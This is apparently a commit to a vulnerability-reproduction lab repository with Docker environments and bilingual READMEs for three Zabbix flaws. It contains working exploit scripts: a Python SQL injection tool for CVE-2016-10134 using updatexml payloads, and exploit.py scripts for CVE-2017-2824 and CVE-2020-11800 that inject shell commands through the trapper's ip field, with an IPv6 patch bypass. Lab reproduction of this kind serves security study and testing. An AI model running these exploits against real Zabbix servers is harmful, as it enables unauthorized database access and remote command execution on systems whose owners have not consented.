first commit

zabbix/CVE-2016-10134/CVE-2016-10134.py

@@ -0,0 +1,96 @@
+# -*- coding: utf-8 -*-
+# @Time    : 2021/12/23
+# @Author  : TesterCC
+
+import json
+
+from optparse import OptionParser
+
+import re
+import sys
+
+from requests import session
+
+# initialization
+ret = dict()
+ret['status'] = str()
+ret['info'] = list()
+
+ss = session()
+ss.headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate',
+              'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
+
+
+# CVE-2016-10134  # python3 CVE-2016-10134.py --target 127.0.0.1:8080
+
+def get_payload1(text) -> str:
+    payload = re.search(r"\[(.*\))\]", text)
+    return payload.group(1)
+
+
+def get_sql_injection_info(text) -> str:
+    sql_injection_info = re.search(r"<\/li><li>(.*)\'\]", text)
+    return sql_injection_info.group(1)
+
+
+def attack(target):
+    '''login zabbix'''
+    login_url = "http://{}/index.php".format(target)
+
+    ret0 = ss.get(login_url)
+
+    cookie_dict = {i.name: i.value for i in ret0.cookies}
+    # get sid
+    sid = cookie_dict.get('zbx_sessionid')[16:]
+
+    data = {"sid": sid,
+            "form_refresh": "1",
+            "name": "",
+            "password": "",
+            "enter": "Sign+in"}
+
+    retn = ss.post(url=login_url, headers=ss.headers, data=data)
+    if retn.status_code == 200:
+        # updatexml(0,concat(0xa,database()),0)
+        # updatexml(0,concat(0xa,version()),0)
+        payload1 = f"http://{target}/latest.php?output=ajax&sid={sid}&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)"
+
+        retn2 = ss.get(url=payload1, headers=ss.headers)
+
+        if retn2.status_code == 200:
+            resp = {
+                "payload": get_payload1(retn2.text),
+                "info": get_sql_injection_info(retn2.text)
+            }
+
+            ret['status'] = 'success'
+            ret['info'] = resp
+
+    return ret
+
+
+def main():
+    usage = "Usage: python3 CVE-2016-10134.py --target <target ip:port>"
+    parse = OptionParser(usage=usage)
+    parse.add_option("-t", '--target', type="string", dest="target", help="server ip:port, e.g. 127.0.0.1:8080")
+
+    options, args = parse.parse_args()
+
+    if not options.target:
+        ret['status'] = 'fail'
+        ret['info'] = "target empty"
+        print(usage)
+        sys.exit()
+    else:
+        target = options.target
+
+    try:
+        attack(target)
+    except Exception:
+        ret['status'] = 'fail'
+
+    print(json.dumps(ret))
+
+
+if __name__ == '__main__':
+    main()

zabbix/CVE-2016-10134/README.md

@@ -0,0 +1,47 @@
+# Zabbix latest.php SQL Injection (CVE-2016-10134)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Zabbix is a server monitoring software that consists of server, agent, and web modules. The web module is written in PHP and is used to display results from the database.
+
+In the Zabbix version before 2.2.14 and 3.0 before 3.0.4, there is a SQL injection vulnerability in the `latest.php` file. This vulnerability allows remote attackers to execute arbitrary SQL commands via the `toggle_ids` array parameter. This vulnerability can also be triggered through jsrpc.php without authentication.
+
+References:
+
+- https://support.zabbix.com/browse/ZBX-11023
+- https://www.exploit-db.com/exploits/40237
+- https://www.exploit-db.com/exploits/40353
+
+## Environment Setup
+
+Execute the following command to start Zabbix 3.0.3:
+
+```
+docker compose up -d
+```
+
+After executing the command, it will start the database (MySQL), Zabbix server, Zabbix agent, and Zabbix web interface. If your system has limited memory, some containers might fail to start. You can check container status using `docker compose ps` and restart containers using `docker compose start`.
+
+## Vulnerability Reproduction
+
+Visit `http://your-ip:8080` and log in with the guest account (username: `guest`, password: empty).
+
+After logging in, check the `zbx_sessionid` in your cookies and copy the last 16 characters:
+
+![](1.png)
+
+Use these 16 characters as the sid value and visit `http://your-ip:8080/latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)`. You can see the successful SQL injection:
+
+![](2.png)
+
+This vulnerability can also be triggered through jsrpc.php without requiring login: `http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)`:
+
+![](3.png)
+
+During debugging, I discovered that the `latest.php` SQL injection is possible without requiring a username and password. For implementation details, see the POC.
+
+```shell
+python3 CVE-2016-10134.py -t 127.0.0.1:8080
+
+python3 CVE-2016-10134.py --target 127.0.0.1:8080
+```

zabbix/CVE-2016-10134/README.zh-cn.md

@@ -0,0 +1,49 @@
+# Zabbix latest.php SQL注入漏洞（CVE-2016-10134）
+
+[English](README.md)
+
+Zabbix是一款服务器监控软件，其由server、agent、web等模块组成，其中web模块由PHP编写，用来显示数据库中的结果。
+
+在Zabbix版本2.2.14和3.0.4之前，`latest.php`文件存在SQL注入漏洞。该漏洞允许远程攻击者通过`toggle_ids`数组参数在latest.php中执行任意SQL命令。该漏洞也可以通过jsrpc.php利用，且无需任何用户身份。
+
+参考链接：
+
+- https://support.zabbix.com/browse/ZBX-11023
+- https://www.exploit-db.com/exploits/40237
+- https://www.exploit-db.com/exploits/40353
+
+## 环境搭建
+
+执行如下命令启动Zabbix 3.0.3:
+
+```
+docker compose up -d
+```
+
+执行命令后，将启动数据库（MySQL）、Zabbix server、Zabbix agent、Zabbix web。如果内存稍小，可能会存在某个容器挂掉的情况，我们可以通过`docker compose ps`查看容器状态，并通过`docker compose start`来重新启动容器。
+
+## 漏洞复现
+
+访问`http://your-ip:8080`，用账号`guest`（密码为空）登录游客账户。
+
+登录后，查看Cookie中的`zbx_sessionid`，复制后16位字符：
+
+![](1.png)
+
+将这16个字符作为sid的值，访问`http://your-ip:8080/latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)`，可见成功注入：
+
+![](2.png)
+
+这个漏洞也可以通过jsrpc.php触发，且无需登录：`http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)`：
+
+![](3.png)
+
+## POC验证
+
+调试中，我发现不用用户名和密码也可以在latest.php中进行SQL注入，实现细节见POC。
+
+```shell
+python3 CVE-2016-10134.py -t 127.0.0.1:8080
+
+python3 CVE-2016-10134.py --target 127.0.0.1:8080
+```

zabbix/CVE-2016-10134/docker-compose.yml

@@ -0,0 +1,48 @@
+services:
+ server:
+   image: vulhub/zabbix:3.0.3-server
+   command: server
+   depends_on:
+    - mysql
+   environment: 
+    - DATABASE_HOST=mysql
+    - DATABASE_PORT=3306
+    - DATABASE_USER=root
+    - DATABASE_PASS=root
+    - DATABASE_NAME=zabbix
+ agent:
+   image: vulhub/zabbix:3.0.3-server
+   command: agent
+   depends_on:
+    - mysql
+    - server
+   environment: 
+    - ZBX_SRV_HOST=server
+    - ZBX_SRV_HOST_ACT=server
+    - DATABASE_HOST=mysql
+    - DATABASE_PORT=3306
+    - DATABASE_USER=root
+    - DATABASE_PASS=root
+    - DATABASE_NAME=zabbix
+ mysql:
+   image: mysql:5
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=zabbix
+   volumes:
+    - ./database/:/docker-entrypoint-initdb.d/
+ web:
+   image: vulhub/zabbix:3.0.3-web
+   depends_on:
+    - server
+    - mysql
+   environment:
+    - DATABASE_HOST=mysql
+    - DATABASE_PORT=3306
+    - DATABASE_USER=root
+    - DATABASE_PASS=root
+    - DATABASE_NAME=zabbix
+    - ZBX_SRV_HOST=server
+    - ZBX_SRV_PORT=10051
+   ports:
+    - "8080:80"

zabbix/CVE-2017-2824/README.md

@@ -0,0 +1,70 @@
+# Zabbix Server Active Proxy Trapper Command Injection (CVE-2017-2824)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Zabbix is a server monitoring software that consists of server, agent, and web modules. The web module is written in PHP and is used to display results from the database.
+
+In the Zabbix version 2.0.x prior to 2.0.21, 2.2.x prior to 2.2.18, 2.4.x, 3.0.x prior to 3.0.9, or 3.2.x prior to 3.2.5, there is a code execution vulnerability in Zabbix's server-side trapper command functionality, where specific packets can cause command injection, leading to remote code execution. An attacker can trigger this vulnerability by initiating a request from a Zabbix proxy.
+
+Reference:
+
+- https://talosintelligence.com/reports/TALOS-2017-0325
+- https://support.zabbix.com/browse/ZBX-12075
+
+## Environment Setup
+
+Execute the following command to start a complete Zabbix 3.0.3 environment, including the Web interface, Server, 1 Agent, and MySQL database:
+
+```
+docker compose up -d
+```
+
+After executing the command, run `docker compose ps` to check if all containers have started successfully. If not, try running `docker compose up -d` again.
+
+To exploit this vulnerability, you need to enable the auto-registration feature on the server side. First, log in to the backend as an administrator using the credentials `admin/zabbix`. Go to Configuration->Actions, change the Event source to Auto registration, then click Create action and create an Action with any name:
+
+![](1.png)
+
+In the third tab, create an Operation with type "Add Host":
+
+![](2.png)
+
+Save the settings. This enables the auto-registration feature, allowing attackers to register their servers as Agents.
+
+## Vulnerability Reproduction
+
+Use this simple POC to reproduce the vulnerability:
+
+```python
+import sys
+import socket
+import json
+import sys
+
+
+def send(ip, data):
+    conn = socket.create_connection((ip, 10051), 10)
+    conn.send(json.dumps(data).encode())
+    data = conn.recv(2048)
+    conn.close()
+    return data
+
+
+target = sys.argv[1]
+print(send(target, {"request":"active checks","host":"vulhub","ip":";touch /tmp/success"}))
+for i in range(10000, 10500):
+    data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
+    if data and b'failed' not in data:
+        print('hostid: %d' % i)
+        print(data)
+```
+
+This POC is relatively basic and may need to be executed multiple times. When you see the following result, it indicates successful command execution:
+
+![](3.png)
+
+Enter the server container, and you can see that `/tmp/success` has been successfully created:
+
+![](4.png)
+
+Interested users can improve this POC and submit a Pull Request.

zabbix/CVE-2017-2824/README.zh-cn.md

@@ -0,0 +1,68 @@
+# Zabbix Server Active Proxy Trapper 命令注入漏洞（CVE-2017-2824）
+
+Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统，基于 Server-Client 架构。
+
+在Zabbix版本2.0.x 2.0.21之前，2.2.x 2.2.18之前，2.4.x，3.0.x 3.0.9之前，或者3.2.x 3.2.5之前，Zabbix的server-side trapper命令功能存在一处代码执行漏洞，特定的数据包可造成命令注入，进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求，从而触发漏洞。
+
+参考链接：
+
+- https://talosintelligence.com/reports/TALOS-2017-0325
+- https://support.zabbix.com/browse/ZBX-12075
+
+## 环境搭建
+
+执行如下命令启动一个完整的Zabbix 3.0.3环境，包含Web端、Server端、1个Agent和Mysql数据库：
+
+```
+docker compose up -d
+```
+
+命令执行后，执行`docker compose ps`查看容器是否全部成功启动，如果没有，可以尝试重新执行`docker compose up -d`。
+
+利用该漏洞，需要你服务端开启了自动注册功能，所以我们先以管理员的身份开启自动注册功能。使用账号密码`admin/zabbix`登录后台，进入Configuration->Actions，将Event source调整为Auto registration，然后点击Create action，创建一个Action，名字随意：
+
+![](1.png)
+
+第三个标签页，创建一个Operation，type是"Add Host"：
+
+![](2.png)
+
+保存。这样就开启了自动注册功能，攻击者可以将自己的服务器注册为Agent。
+
+## 漏洞复现
+
+使用这个简单的POC来复现漏洞：
+
+```python
+import sys
+import socket
+import json
+import sys
+
+
+def send(ip, data):
+    conn = socket.create_connection((ip, 10051), 10)
+    conn.send(json.dumps(data).encode())
+    data = conn.recv(2048)
+    conn.close()
+    return data
+
+
+target = sys.argv[1]
+print(send(target, {"request":"active checks","host":"vulhub","ip":";touch /tmp/success"}))
+for i in range(10000, 10500):
+    data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
+    if data and b'failed' not in data:
+        print('hostid: %d' % i)
+        print(data)
+```
+
+这个POC比较初级，请多执行几次，当查看到如下结果时，则说明命令执行成功：
+
+![](3.png)
+
+进入server容器，可见`/tmp/success`已成功创建：
+
+![](4.png)
+
+有兴趣的同学可以对这个POC进行改进，提交Pull Request。

zabbix/CVE-2017-2824/docker-compose.yml

@@ -0,0 +1,50 @@
+services:
+ server:
+   image: vulhub/zabbix:3.0.3-server
+   command: server
+   depends_on:
+    - mysql
+   environment: 
+    - DATABASE_HOST=mysql
+    - DATABASE_PORT=3306
+    - DATABASE_USER=root
+    - DATABASE_PASS=root
+    - DATABASE_NAME=zabbix
+   ports: 
+    - "10051:10051"
+ agent:
+   image: vulhub/zabbix:3.0.3-server
+   command: agent
+   depends_on:
+    - mysql
+    - server
+   environment: 
+    - ZBX_SRV_HOST=server
+    - ZBX_SRV_HOST_ACT=server
+    - DATABASE_HOST=mysql
+    - DATABASE_PORT=3306
+    - DATABASE_USER=root
+    - DATABASE_PASS=root
+    - DATABASE_NAME=zabbix
+ mysql:
+   image: mysql:5
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=zabbix
+   volumes:
+    - ./database/:/docker-entrypoint-initdb.d/
+ web:
+   image: vulhub/zabbix:3.0.3-web
+   depends_on:
+    - server
+    - mysql
+   environment:
+    - DATABASE_HOST=mysql
+    - DATABASE_PORT=3306
+    - DATABASE_USER=root
+    - DATABASE_PASS=root
+    - DATABASE_NAME=zabbix
+    - ZBX_SRV_HOST=server
+    - ZBX_SRV_PORT=10051
+   ports:
+    - "8080:80"

zabbix/CVE-2017-2824/exploit.py

@@ -0,0 +1,21 @@
+import sys
+import socket
+import json
+import sys
+
+
+def send(ip, data):
+    conn = socket.create_connection((ip, 10051), 10)
+    conn.send(json.dumps(data).encode())
+    data = conn.recv(2048)
+    conn.close()
+    return data
+
+
+target = sys.argv[1]
+print(send(target, {"request":"active checks","host":"vulhub","ip":";touch /tmp/success"}))
+for i in range(10000, 10500):
+    data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
+    if data and b'failed' not in data:
+        print('hostid: %d' % i)
+        print(data)

zabbix/CVE-2020-11800/README.md

@@ -0,0 +1,63 @@
+# Zabbix Server Active Proxy Trapper Command Injection Bypass (CVE-2020-11800)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Zabbix is a network monitoring and management system developed by Alexei Vladishev, based on a Server-Client architecture. In [CVE-2017-2824][1], there was a code execution vulnerability in the Server-side trapper command functionality. However, the patch for that vulnerability was incomplete, allowing attackers to bypass it using IPv6 to inject arbitrary commands.
+
+Reference:
+
+- https://xz.aliyun.com/t/8991
+
+## Environment Setup
+
+Execute the following command to start a complete Zabbix environment, including the Web interface, Server, 1 Agent, and MySQL database:
+
+```
+docker compose up -d
+```
+
+After executing the command, run `docker compose ps` to check if all containers have started successfully. If not, try running `docker compose up -d` again.
+
+To exploit this vulnerability, you need to enable the auto-registration feature on the server side. For instructions on how to enable it, please refer to [CVE-2017-2824][1].
+
+## Vulnerability Reproduction
+
+Modify the IP field in the [CVE-2017-2824][1] POC to create a new POC:
+
+```python
+import sys
+import socket
+import json
+import sys
+
+
+def send(ip, data):
+    conn = socket.create_connection((ip, 10051), 10)
+    conn.send(json.dumps(data).encode())
+    data = conn.recv(2048)
+    conn.close()
+    return data
+
+
+target = sys.argv[1]
+print(send(target, {"request":"active checks","host":"vulhub","ip":"ffff:::;touch /tmp/success2"}))
+for i in range(10000, 10500):
+    data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
+    if data and b'failed' not in data:
+        print('hostid: %d' % i)
+        print(data)
+```
+
+As you can see, this POC is very similar to the [CVE-2017-2824][1] POC, but I use IPv6 `ffff:::;touch /tmp/success2` to bypass the patch.
+
+When you see the following result, it indicates successful command execution:
+
+![](1.png)
+
+Enter the server container, and you can see that `/tmp/success2` has been successfully created:
+
+![](2.png)
+
+Interested users can improve this POC and submit a Pull Request.
+
+[1]: ../CVE-2017-2824

zabbix/CVE-2020-11800/README.zh-cn.md

@@ -0,0 +1,61 @@
+# Zabbix Server Active Proxy Trapper 命令注入漏洞修复绕过（CVE-2020-11800）
+
+Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统，基于 Server-Client 架构。在[CVE-2017-2824][1]中，其Server端 trapper command 功能存在一处代码执行漏洞，而修复补丁并不完善，导致可以利用IPv6进行绕过，注入任意命令。
+
+参考链接：
+
+- https://xz.aliyun.com/t/8991
+
+## 环境搭建
+
+执行如下命令启动一个完整的Zabbix环境，包含Web端、Server端、1个Agent和Mysql数据库：
+
+```
+docker compose up -d
+```
+
+命令执行后，执行`docker compose ps`查看容器是否全部成功启动，如果没有，可以尝试重新执行`docker compose up -d`。
+
+利用该漏洞，需要你服务端开启了自动注册功能，开启方法请参考[CVE-2017-2824][1]。
+
+## 漏洞复现
+
+修改[CVE-2017-2824][1]的POC中的IP字段，构造新的POC：
+
+```python
+import sys
+import socket
+import json
+import sys
+
+
+def send(ip, data):
+    conn = socket.create_connection((ip, 10051), 10)
+    conn.send(json.dumps(data).encode())
+    data = conn.recv(2048)
+    conn.close()
+    return data
+
+
+target = sys.argv[1]
+print(send(target, {"request":"active checks","host":"vulhub","ip":"ffff:::;touch /tmp/success2"}))
+for i in range(10000, 10500):
+    data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
+    if data and b'failed' not in data:
+        print('hostid: %d' % i)
+        print(data)
+```
+
+可见，这个POC与[CVE-2017-2824][1]的POC非常相似，但我使用IPv6 `ffff:::;touch /tmp/success2`绕过了修复补丁。
+
+当查看到如下结果时，则说明命令执行成功：
+
+![](1.png)
+
+进入server容器，可见`/tmp/success2`已成功创建：
+
+![](2.png)
+
+有兴趣的同学可以对这个POC进行改进，提交Pull Request。
+
+[1]: ../CVE-2017-2824

zabbix/CVE-2020-11800/docker-compose.yml

@@ -0,0 +1,51 @@
+version: '2'
+services:
+ server:
+   image: vulhub/zabbix:3.0.3-server
+   command: server
+   depends_on:
+    - mysql
+   environment: 
+    - DATABASE_HOST=mysql
+    - DATABASE_PORT=3306
+    - DATABASE_USER=root
+    - DATABASE_PASS=root
+    - DATABASE_NAME=zabbix
+   ports: 
+    - "10051:10051"
+ agent:
+   image: vulhub/zabbix:3.0.3-server
+   command: agent
+   depends_on:
+    - mysql
+    - server
+   environment: 
+    - ZBX_SRV_HOST=server
+    - ZBX_SRV_HOST_ACT=server
+    - DATABASE_HOST=mysql
+    - DATABASE_PORT=3306
+    - DATABASE_USER=root
+    - DATABASE_PASS=root
+    - DATABASE_NAME=zabbix
+ mysql:
+   image: mysql:5
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=zabbix
+   volumes:
+    - ./database/:/docker-entrypoint-initdb.d/
+ web:
+   image: vulhub/zabbix:3.0.3-web
+   depends_on:
+    - server
+    - mysql
+   environment:
+    - DATABASE_HOST=mysql
+    - DATABASE_PORT=3306
+    - DATABASE_USER=root
+    - DATABASE_PASS=root
+    - DATABASE_NAME=zabbix
+    - ZBX_SRV_HOST=server
+    - ZBX_SRV_PORT=10051
+   ports:
+    - "8080:80"

zabbix/CVE-2020-11800/exploit.py

@@ -0,0 +1,21 @@
+import sys
+import socket
+import json
+import sys
+
+
+def send(ip, data):
+    conn = socket.create_connection((ip, 10051), 10)
+    conn.send(json.dumps(data).encode())
+    data = conn.recv(2048)
+    conn.close()
+    return data
+
+
+target = sys.argv[1]
+print(send(target, {"request":"active checks","host":"vulhub","ip":"ffff:::;touch /tmp/success2"}))
+for i in range(10000, 10500):
+    data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
+    if data and b'failed' not in data:
+        print('hostid: %d' % i)
+        print(data)